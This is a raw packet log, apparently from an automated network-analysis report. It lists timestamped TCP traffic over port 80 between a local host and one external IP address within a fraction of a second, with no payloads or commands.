Jan 14, 2025 16:21:09.728877068 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.728885889 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.728894949 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.728897095 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.728916883 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.728933096 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.732147932 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.732167959 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.732178926 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.732188940 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.732215881 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.732223988 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.732237101 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.732264042 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.732279062 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.732281923 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.732291937 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.732317924 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.732319117 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.732330084 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.732359886 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.732388020 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.732399940 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.732410908 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.732423067 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.732433081 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.732449055 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.732466936 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.732532978 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.732543945 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.732554913 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.732566118 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.732577085 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.732584953 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.732589006 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.732601881 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.732621908 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.732623100 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.732634068 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.732661963 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.756815910 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.756829023 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.756840944 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.756911039 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.756912947 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.756922007 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.756932020 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.756957054 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.756978035 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.757011890 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.757024050 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.757035017 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.757047892 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.757055044 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.757075071 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.757097006 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.757251024 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.757261992 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.757271051 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.757282972 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.757292032 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.757302999 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.757308006 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.757313013 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.757324934 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.757328033 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.757342100 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.757369041 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.757371902 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.757383108 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.757392883 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.757411003 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.757416010 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.757446051 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.757531881 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.757544994 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.757555962 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.757566929 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.757574081 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.757580042 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.757603884 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.757616997 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.814209938 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.814228058 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.814277887 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.814306021 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.814316988 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.814322948 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.814343929 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.814363003 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.814364910 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.814384937 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.814390898 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.814408064 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.814426899 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.814429998 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.814452887 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.814470053 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.814472914 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.814486027 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.814492941 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.814511061 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.814532042 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.814532995 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.814563990 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.814577103 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.814585924 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.814606905 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.814610958 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.814626932 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.814644098 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.814661026 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.814681053 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.814694881 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.814712048 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.814728975 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.814738035 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.814758062 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.814766884 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.814785957 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.814790010 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.814810038 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.814810991 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.814834118 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.814841032 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.814851999 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.814882994 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.814907074 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.814934015 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.814953089 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.814953089 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.814969063 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.814979076 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.814991951 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.815011024 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.815013885 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.815028906 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.815047026 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.815052032 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.815074921 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.815088034 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.815093040 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.815107107 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.815131903 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.815150976 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.815182924 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.815208912 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.815227032 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.815231085 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.815243959 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.815248013 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.815268040 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.815289974 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.815521002 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.815542936 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.815557003 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.815571070 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.815579891 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.815598965 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.815599918 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.815622091 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.815624952 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.815634012 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.815646887 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.815649033 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.815663099 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.815676928 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.815679073 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.815690994 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.815705061 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.815712929 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.815720081 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.815728903 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.815738916 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.815762043 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.815768957 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.815769911 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.815788984 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.815795898 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.815817118 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.815819025 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.815830946 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.815840960 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.815850973 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.815856934 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.815860033 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.815874100 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.815895081 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.816150904 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.816165924 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.816179991 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.816195011 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.816199064 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.816207886 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.816217899 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.816234112 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.816253901 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.816273928 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.816288948 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.816303968 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.816315889 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.816318989 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.816329956 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.816333055 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.816348076 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.816359043 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.816360950 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.816374063 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.816375971 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.816395044 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.816411018 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.818849087 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.818892956 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.818911076 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.818926096 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.818932056 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.818948030 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.818963051 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.818969965 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.818978071 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.818988085 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.818995953 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.819005966 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.819026947 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.819031000 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.819041967 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.819046974 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.819056988 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.819062948 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.819086075 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.819087029 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.819106102 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.819108963 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.819123983 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.819127083 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.819147110 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.819153070 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.819156885 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.819175005 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.819191933 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.819197893 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.819211960 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.819215059 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.819230080 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.819232941 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.819245100 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.819251060 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.819259882 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.819273949 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.819276094 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.819295883 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.819309950 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.841435909 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.841473103 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.841494083 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.841487885 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.841511965 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.841530085 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.841532946 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.841547966 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.841564894 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.841572046 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.841582060 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.841597080 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.841597080 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.841614008 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.841622114 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.841639042 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.841654062 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.841658115 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.841675997 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.841691971 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.841712952 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.841723919 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.841742039 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.841758966 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.841763973 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.841784000 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.841803074 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.841844082 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.841859102 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.841873884 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.841882944 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.841886997 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.841901064 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.841903925 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.841917038 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.841927052 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.841945887 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.842057943 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.842072010 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.842087030 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.842096090 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.842101097 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.842116117 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.842119932 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.842130899 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.842140913 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.842164993 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.842180014 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.842195034 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.842220068 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.842238903 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.904072046 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.904088974 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.904099941 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.904110909 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.904123068 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.904134035 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.904185057 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.904206038 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.904352903 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.904364109 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.904375076 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.904386044 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.904396057 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.904407024 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.904417992 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.904428005 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.904432058 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.904438972 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.904449940 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.904460907 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.904470921 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.904475927 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.904479980 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.904498100 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.904503107 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.904515028 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.904525995 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.904526949 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.904539108 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.904548883 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.904551983 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.904560089 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.904570103 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.904576063 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.904581070 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.904591084 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.904598951 CET	49165	80	192.168.2.22	45.155.249.215
